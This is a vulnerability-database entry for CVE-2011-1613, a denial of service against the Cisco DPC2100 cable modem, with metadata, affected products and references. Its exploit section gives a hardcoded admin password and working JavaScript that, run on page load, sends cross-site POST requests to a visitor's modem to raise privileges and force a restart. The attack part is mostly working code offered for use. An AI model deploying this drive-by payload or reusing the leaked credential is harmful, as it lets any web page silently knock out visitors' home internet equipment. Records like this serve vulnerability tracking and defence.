ID
VAR-E-201104-0199
CVE
| cve_id: | CVE-2011-1613 | Trust: 2.4 |
EDB ID
21523
TITLE
Cisco DPC2100 - Denial of Service - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
Cisco DPC2100 - Denial of Service. CVE-2011-1613CVE-72616 . dos exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | cisco | model: | dpc2100 | scope: | - | version: | - | Trust: 2.1 |
| vendor: | cisco | model: | wlc526 mobility express controller | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | wlc modules for integrated services routers | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | wireless lan control | scope: | eq | version: | 6.0.182.0 | Trust: 0.3 |
| vendor: | cisco | model: | wireless lan control | scope: | eq | version: | 7.0 | Trust: 0.3 |
| vendor: | cisco | model: | wireless lan control | scope: | eq | version: | 6.0.199.0 | Trust: 0.3 |
| vendor: | cisco | model: | wireless lan control | scope: | eq | version: | 6.0.196.0 | Trust: 0.3 |
| vendor: | cisco | model: | wireless lan control | scope: | eq | version: | 6.0.188.0 | Trust: 0.3 |
| vendor: | cisco | model: | wireless lan control | scope: | eq | version: | 6.0 | Trust: 0.3 |
| vendor: | cisco | model: | wireless lan controller | scope: | eq | version: | 21000 | Trust: 0.3 |
| vendor: | cisco | model: | wireless lan control | scope: | ne | version: | 7.0.98.216 | Trust: 0.3 |
| vendor: | cisco | model: | wireless lan control | scope: | ne | version: | 7.0.112.0 | Trust: 0.3 |
| vendor: | cisco | model: | wireless lan control | scope: | ne | version: | 6.0.200.0 | Trust: 0.3 |
EXPLOIT
# Exploit Title: Cisco DPC2100 Denial of Service
# Date: 09/01/2010
# Author: Daniel Smith
# Software Link: http://www.cisco.com/
# Version: HW:2.1/SW:v2.0.2r1256-060303
# Tested on: OSX 10.6/Win7
# CVE: CVE-2011-1613
=======================================================
Information
=======================================================
Executing this script on page load will cause the users modem to restart when
they visit the page. This example uses javascript but can just as easily written
to in another language to accomplish something similar. Attack consists of
two parts.
Part 1 - Privilege Escalation:
POST: http://192.168.100.1/goform/_aslvl
PARAMS: SAAccessLevel=2&SAPassword=W2402
Part 2 - Modem Restart:
POST: http://192.168.100.1/goform/gscan
PARAMS: SADownStartingFrequency=705000000
=======================================================
Proof of Concept (Javascript)
=======================================================
(function() {
var b=document.getElementsByTagName('body')[0];
var otherlib=false;
if(typeof jQuery!='undefined') {
console.log('This page already using jQuery v'+jQuery.fn.jquery);
} else if (typeof $=='function') {
otherlib=true;
}
function getScript(url,success){
var script=document.createElement('script');
script.src=url;
var head=document.getElementsByTagName('head')[0],
done=false;
// Attach handlers for all browsers
script.onload=script.onreadystatechange = function(){
if ( !done && (!this.readyState
|| this.readyState == 'loaded'
|| this.readyState == 'complete') ) {
done=true;
success();
script.onload = script.onreadystatechange = null;
head.removeChild(script);
}
};
head.appendChild(script);
}
getScript('http://code.jquery.com/jquery-latest.min.js',function() {
if (typeof jQuery=='undefined') {
console.log('Sorry, but jQuery wasn\'t able to load');
} else {
console.log('This page is now jQuerified with v' + jQuery.fn.jquery);
$.post("http://192.168.100.1/goform/_aslvl", { SAAccessLevel: "2", SAPassword: "W2402" } );
console.log('Privilege Escalation: temporarily setting SAAccessLevel to \'2\'.');
$.post("http://192.168.100.1/goform/gscan", { SADownStartingFrequency: "705000000" } );
console.log('Reboot command sent.');
}
});
})();
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Denial of Service
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | denial of service | Trust: 0.5 |
CREDITS
Daniel Smith
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2011-1613 | Trust: 2.4 |
| db: | EXPLOIT-DB | id: | 21523 | Trust: 1.6 |
| db: | EDBNET | id: | 43611 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 116898 | Trust: 0.5 |
| db: | BID | id: | 47606 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2011-1613 | Trust: 2.1 |
| url: | https://www.exploit-db.com/exploits/21523/ | Trust: 0.6 |
| url: | http://www.cisco.com/ | Trust: 0.3 |
| url: | http://www.cisco.com/en/us/products/products_security_advisory09186a0080b7950e.shtml | Trust: 0.3 |
SOURCES
| db: | BID | id: | 47606 |
| db: | PACKETSTORM | id: | 116898 |
| db: | EXPLOIT-DB | id: | 21523 |
| db: | EDBNET | id: | 43611 |
LAST UPDATE DATE
2022-07-27T09:56:59.218000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 47606 | date: | 2012-09-26T14:50:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 47606 | date: | 2011-04-27T00:00:00 |
| db: | PACKETSTORM | id: | 116898 | date: | 2012-09-26T23:48:28 |
| db: | EXPLOIT-DB | id: | 21523 | date: | 2012-09-26T00:00:00 |
| db: | EDBNET | id: | 43611 | date: | 2012-09-26T00:00:00 |